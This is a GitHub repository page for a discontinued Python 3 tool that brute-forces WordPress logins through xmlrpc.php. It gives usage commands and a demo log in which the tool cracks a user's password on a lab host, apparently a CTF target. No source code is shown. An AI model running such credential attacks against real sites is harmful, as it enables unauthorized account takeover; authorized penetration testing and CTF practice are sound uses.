Skip to content

An XMLRPC brute forcer targeting Wordpress written in Python 3. (DISCONTINUED)

Notifications You must be signed in to change notification settings

chivo912/xmlrpc-bruteforcer

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
 
 
 
 

Repository files navigation

An XMLRPC BruteForcer for Wordpress - Inpired by (1N3@CrowdShield)

Note - This project is discontinued. No more updates will be provided! Sorry!

I switched to golang :-)

Fork it/do whatever you want with it.

Twitter - Telegram - Blog

Available in

Usage

python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt ( >>in progess<<)

Bugs

If you get an xml.etree.ElementTree.ParseError:

  • Did you forget to add 'xmlrpc' in the url ?
  • Try to add or remove 'https' or 'www'.

TODO

  • Exception Handling for xml.etree.ElementTree.ParseError
  • 'userlist' enumeration

Demo

MacBook-Pro: kavish$ python3 xmlrpcbruteforce.py http://192.168.100.34/xmlrpc.php 10k-most-common.txt elliot

---------------Examining Target--------------------

[>] Target is vulnerable.

--=[Target: http://192.168.100.34/xmlrpc.php]=--

        	[...Bruteforcing...]
--=[Tried: 1000 passwords]=--
--=[Tried: 2000 passwords]=--
--=[Tried: 3000 passwords]=--
--------------- BRUTEFORCE SUCCESSFULL  ---------------
--=[User found]=--
Login: elliot
Password: ER28-0652
--=[Exiting...]=--

About

An XMLRPC brute forcer targeting Wordpress written in Python 3. (DISCONTINUED)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%